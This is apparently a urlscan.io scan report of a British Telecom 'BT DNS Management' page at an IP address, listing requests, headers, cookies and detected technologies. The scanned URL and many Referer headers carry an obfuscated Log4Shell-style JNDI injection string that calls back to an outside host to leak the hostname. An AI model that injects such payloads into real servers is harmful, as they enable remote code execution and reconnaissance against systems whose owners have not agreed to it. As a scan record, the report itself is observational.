urlscan.io logo urlscan.io
SecurityTrails logo

212.140.59.17 Open in urlscan Pro
212.140.59.17  Public Scan

Go To Rescan Add Verdict Report
URL: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4...
Submission: On February 11 via manual from GB — Scanned from GB
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 2 IPs in 2 countries across 1 domains to perform 14 HTTP transactions. The main IP is 212.140.59.17, located in United Kingdom and belongs to BT-UK-AS BTnet UK Regional network, GB. The main domain is 212.140.59.17.
TLS certificate: Issued by GeoTrust EV RSA CA 2018 on April 7th 2021. Valid for: a year.
This is the only time 212.140.59.17 was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
12 212.140.59.17 2856 (BT-UK-AS ...)
2 2a00:1450:400... 15169 (GOOGLE)
14 2
Apex Domain
Subdomains		 Transfer
2 google-analytics.com
www.google-analytics.com — Cisco Umbrella Rank: 31
20 KB
14 1
Domain Requested by
2 www.google-analytics.com 212.140.59.17
www.google-analytics.com
14 1

This site contains no links.

Subject Issuer Validity Valid
dmc.bt.com
GeoTrust EV RSA CA 2018		 2021-04-07 -
2022-04-12		 a year crt.sh
*.google-analytics.com
GTS CA 1C3		 2022-01-10 -
2022-04-04		 3 months crt.sh

This page contains 1 frames:

Primary Page: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Frame ID: B7A837BE712B5A03280AEA27A155FAE7
Requests: 14 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page Title

BT DNS Management

Detected technologies

Overall confidence: 100%
Detected patterns
  • bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.js
Overall confidence: 100%
Detected patterns
  • <link[^>]* href=[^>]*?(?:F|f)o(?:n|r)t-?(?:A|a)wesome(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)
  • (?:F|f)o(?:n|r)t-?(?:A|a)wesome(?:.*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)
Overall confidence: 100%
Detected patterns
  • google-analytics\.com/(?:ga|urchin|analytics)\.js

Page Statistics

14
Requests

14 %
HTTPS

50 %
IPv6

1
Domains

1
Subdomains

2
IPs

2
Countries

851 kB
Transfer

1358 kB
Size

4
Cookies

Redirected requests

There were HTTP redirect chains for the following requests:

14 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
Primary Request /
212.140.59.17/ 		4 KB
6 KB 		Document
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
e52b96d95eb0d8602d5b8122841de0f22647118c1b842e817f2eb1ec08b7a00a
Security Headers
Name Value
Content-Security-Policy default-src 'self'; connect-src 'self' https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com; img-src 'self' https://www.google-analytics.com data:; script-src 'self' 'unsafe-eval' https://www.google-analytics.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com
Strict-Transport-Security max-age=631138519
X-Content-Type-Options nosniff
X-Frame-Options sameorigin
X-Xss-Protection 1; mode=block

Request headers

Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Accept-Language
en-GB,en;q=0.9

Response headers

Server
nginx
Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Type
text/html; charset=utf-8
Transfer-Encoding
chunked
Connection
keep-alive
Link
</fonts/btfont_rg-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</fonts/btfont_lt-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</fonts/btfont_bd-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</fonts/btfont_exbd-webfont.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</assets/bootstrap/glyphicons-halflings-regular-fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</assets/font-awesome/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2>; rel=preload; as=font; type=font/woff2; crossorigin=anonymous,</assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css>; rel=preload; as=style; nopush,</assets/application-37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303.js>; rel=preload; as=script; nopush,</assets/analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js>; rel=preload; as=script; nopush
ETag
W/"e52b96d95eb0d8602d5b8122841de0f2"
Cache-Control
max-age=0, private, must-revalidate
X-Request-Id
cf278d79-a691-4f51-84bd-c6298b771ae5
X-Runtime
0.005550
Strict-Transport-Security
max-age=631138519
X-Frame-Options
sameorigin
X-Content-Type-Options
nosniff
X-XSS-Protection
1; mode=block
X-Download-Options
noopen
X-Permitted-Cross-Domain-Policies
none
Content-Security-Policy
default-src 'self'; connect-src 'self' https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com; img-src 'self' https://www.google-analytics.com data:; script-src 'self' 'unsafe-eval' https://www.google-analytics.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com
btfont_rg-webfont.woff2
212.140.59.17/fonts/ 		21 KB
21 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/fonts/btfont_rg-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
25566080c82a531e2aa7f70525de2a4db4fa37b2cf7a41ea2e42290d463a4ec3

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-5250"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
21072
Expires
Sat, 11 Feb 2023 11:33:01 GMT
btfont_lt-webfont.woff2
212.140.59.17/fonts/ 		20 KB
20 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/fonts/btfont_lt-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
c385dcaa5ae89a8f863894d3f96978f9448ff1ff2d13eb5e118084de1715664b

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-5050"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
20560
Expires
Sat, 11 Feb 2023 11:33:01 GMT
btfont_bd-webfont.woff2
212.140.59.17/fonts/ 		21 KB
21 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/fonts/btfont_bd-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
144f5ad13785cae9e493493e479fa9908e383b5ea1c086fd6a12ef783bca2edb

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-53a0"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
21408
Expires
Sat, 11 Feb 2023 11:33:01 GMT
btfont_exbd-webfont.woff2
212.140.59.17/fonts/ 		21 KB
21 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/fonts/btfont_exbd-webfont.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
1419ea0ac489572031eeb898cf3e43ea9f0efbc40941b97eac9b083fe67b137b

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Mon, 31 Jan 2022 09:12:19 GMT
Server
nginx
ETag
"61f7a7f3-5328"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
21288
Expires
Sat, 11 Feb 2023 11:33:01 GMT
glyphicons-halflings-regular-fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c.woff2
212.140.59.17/assets/bootstrap/ 		18 KB
18 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/assets/bootstrap/glyphicons-halflings-regular-fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
fe185d11a49676890d47bb783312a0cda5a44c4039214094e7957b4c040ef11c

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Wed, 26 Apr 2017 00:07:59 GMT
Server
nginx
ETag
"58ffe4df-466c"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
18028
Expires
Sat, 11 Feb 2023 11:33:01 GMT
fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2
212.140.59.17/assets/font-awesome/ 		75 KB
76 KB 		Font
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/assets/font-awesome/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe

Request headers

Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Origin
https://212.140.59.17
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Wed, 26 Apr 2017 00:07:52 GMT
Server
nginx
ETag
"58ffe4d8-12d68"
Content-Type
font/woff2
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
77160
Expires
Sat, 11 Feb 2023 11:33:01 GMT
application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
212.140.59.17/assets/ 		216 KB
38 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
14c32e9e7be6c6da3c961d8de7f1eed1ca8be8f02608fd27bb4356cc63865b8b

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Encoding
gzip
Last-Modified
Thu, 16 Dec 2021 13:11:25 GMT
Server
nginx
ETag
"61bb3afd-97dd"
Content-Type
text/css
Cache-Control
max-age=31536000, public
Connection
keep-alive
Content-Length
38877
Expires
Sat, 11 Feb 2023 11:33:01 GMT
application-37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303.js
212.140.59.17/assets/ 		435 KB
129 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/assets/application-37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303.js
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
37183b15c76aa9e6077f8d01fe3b3676ef53c03b8de6d8c2f2990cd9abe87303

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Encoding
gzip
Last-Modified
Thu, 12 Aug 2021 08:04:28 GMT
Server
nginx
ETag
"6114d60c-2023d"
Content-Type
application/javascript
Cache-Control
max-age=31536000, public
Connection
keep-alive
Content-Length
131645
Expires
Sat, 11 Feb 2023 11:33:01 GMT
analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js
212.140.59.17/assets/ 		348 B
608 B 		Script
General
Check archive.org
Download Go to
Full URL
https://212.140.59.17/assets/analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Content-Encoding
gzip
Last-Modified
Tue, 25 Apr 2017 23:32:40 GMT
Server
nginx
ETag
"58ffdc98-10a"
Content-Type
application/javascript
Cache-Control
max-age=31536000, public
Connection
keep-alive
Content-Length
266
Expires
Sat, 11 Feb 2023 11:33:01 GMT
bt-7ff4e0aacbb972d53ce8aa922f581292c525fef66ca8d54367e3f0bdb49e04be.png
212.140.59.17/assets/ 		1 KB
2 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://212.140.59.17/assets/bt-7ff4e0aacbb972d53ce8aa922f581292c525fef66ca8d54367e3f0bdb49e04be.png
Requested by
Host: 212.140.59.17
URL: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
7ff4e0aacbb972d53ce8aa922f581292c525fef66ca8d54367e3f0bdb49e04be

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Thu, 30 Jan 2020 13:47:33 GMT
Server
nginx
ETag
"5e32de75-509"
Content-Type
image/png
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
1289
Expires
Sat, 11 Feb 2023 11:33:01 GMT
analytics.js
www.google-analytics.com/ 		49 KB
20 KB 		Script
General
Check archive.org
Download Go to
Full URL
https://www.google-analytics.com/analytics.js
Requested by
Host: 212.140.59.17
URL: https://212.140.59.17/assets/analytics-f3a0281f016b9dbe19eb119f1de4f3970500a2f71ca8a9885db1fd27f5795edb.js
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:809::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
a1925038db769477ab74b4df34350c35688a795bb718727b0f4292a4a78a6210
Security Headers
Name Value
Strict-Transport-Security max-age=10886400; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

strict-transport-security
max-age=10886400; includeSubDomains; preload
content-encoding
gzip
x-content-type-options
nosniff
last-modified
Tue, 02 Nov 2021 17:39:06 GMT
server
Golfe2
age
7087
date
Fri, 11 Feb 2022 09:34:54 GMT
vary
Accept-Encoding
content-type
text/javascript
cache-control
public, max-age=7200
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length
20006
expires
Fri, 11 Feb 2022 11:34:54 GMT
fibres_small-1be97006443077da6d0574da0364dc108a97ec8ed6465d0bc490089139ec2b9d.jpg
212.140.59.17/assets/ 		477 KB
477 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://212.140.59.17/assets/fibres_small-1be97006443077da6d0574da0364dc108a97ec8ed6465d0bc490089139ec2b9d.jpg
Requested by
Host: 212.140.59.17
URL: https://212.140.59.17/assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
Protocol
HTTP/1.1
Security
TLS 1.2, ECDHE_RSA, AES_128_GCM
Server
212.140.59.17 , United Kingdom, ASN2856 (BT-UK-AS BTnet UK Regional network, GB),
Reverse DNS
Software
nginx /
Resource Hash
1be97006443077da6d0574da0364dc108a97ec8ed6465d0bc490089139ec2b9d

Request headers

Accept-Language
en-GB,en;q=0.9
Referer
https://212.140.59.17/assets/application-fe4b2c6120fa4ec3e3a74f16de32c5d2b54323f5ebfad73da7751c09eb2ec115.css
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36

Response headers

Date
Fri, 11 Feb 2022 11:33:01 GMT
Last-Modified
Fri, 30 Apr 2021 15:35:47 GMT
Server
nginx
ETag
"608c23d3-7744d"
Content-Type
image/jpeg
Cache-Control
max-age=31536000, public
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
488525
Expires
Sat, 11 Feb 2023 11:33:01 GMT
collect
www.google-analytics.com/j/ 		2 B
205 B 		XHR
General
Check archive.org
Download Go to
Full URL
https://www.google-analytics.com/j/collect?v=1&_v=j96&a=684503169&t=pageview&_s=1&dl=https%3A%2F%2F212.140.59.17%2F%3Fi3g4rm2j8tg5tu1%3D%2524%257B%2524%257Blower%253Ajndi%257D%253A%2524%257Blower%253Armi%257D%253A%252F%252Fx%257BhostName%257D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%257D&ul=en-us&de=UTF-8&dt=BT%20DNS%20Management&sd=24-bit&sr=1600x1200&vp=1600x1200&je=0&_u=IEBAAEABAAAAAC~&jid=1088316207&gjid=813600176&cid=425173689.1644579182&tid=UA-75206843-1&_gid=1899576018.1644579182&_r=1&_slc=1&z=1642675816
Requested by
Host: www.google-analytics.com
URL: https://www.google-analytics.com/analytics.js
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2a00:1450:4001:809::200e Frankfurt am Main, Germany, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
a048e640908046be06e00eab37742b5d5ff80964af58cfd22f7cb2de4dfe375f
Security Headers
Name Value
X-Content-Type-Options nosniff

Request headers

Referer
https://212.140.59.17/
Accept-Language
en-GB,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36
Content-Type
text/plain

Response headers

pragma
no-cache
date
Fri, 11 Feb 2022 11:33:01 GMT
x-content-type-options
nosniff
last-modified
Sun, 17 May 1998 03:00:00 GMT
server
Golfe2
content-type
text/plain
access-control-allow-origin
https://212.140.59.17
cache-control
no-cache, no-store, must-revalidate
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
content-length
2
expires
Fri, 01 Jan 1990 00:00:00 GMT

Verdicts & Comments Add Verdict or Comment

15 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

function| structuredClone boolean| windowIsTurbolinked object| cookiesEu function| $ function| jQuery object| jQuery112407373762079572246 function| moment object| App function| Cookies string| GoogleAnalyticsObject function| ga object| google_tag_data object| gaplugins object| gaGlobal object| gaData

4 Cookies

Domain/Path Name / Value
212.140.59.17/ Name: _dmc_session
Value: a4265d4118b43ba1203d195dd366ca6c
212.140.59.17/ Name: _ga
Value: GA1.1.425173689.1644579182
212.140.59.17/ Name: _gid
Value: GA1.1.1899576018.1644579182
212.140.59.17/ Name: _gat
Value: 1

1 Console Messages

Source Level URL
Text
javascript warning URL: https://212.140.59.17/?i3g4rm2j8tg5tu1=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2Fx%7BhostName%7D.i3g4rm2j8tg5tu1.11460.callback1.shadowfoundry.com%7D
Message:
The resource https://212.140.59.17/assets/font-awesome/fontawesome-webfont-2adefcbc041e7d18fcf2d417879dc5a09997aa64d675b7a3c4b6ce33da13f3fe.woff2 was preloaded using link preload but not used within a few seconds from the window's load event. Please make sure it has an appropriate `as` value and it is preloaded intentionally.

Security Headers

This page lists any security headers set by the main page. If you want to understand what these mean and how to use them, head on over to this page

Header Value
Content-Security-Policy default-src 'self'; connect-src 'self' https://www.google-analytics.com; font-src 'self' https://maxcdn.bootstrapcdn.com; img-src 'self' https://www.google-analytics.com data:; script-src 'self' 'unsafe-eval' https://www.google-analytics.com https://maxcdn.bootstrapcdn.com https://ajax.googleapis.com; style-src 'self' 'unsafe-inline' https://maxcdn.bootstrapcdn.com
Strict-Transport-Security max-age=631138519
X-Content-Type-Options nosniff
X-Frame-Options sameorigin
X-Xss-Protection 1; mode=block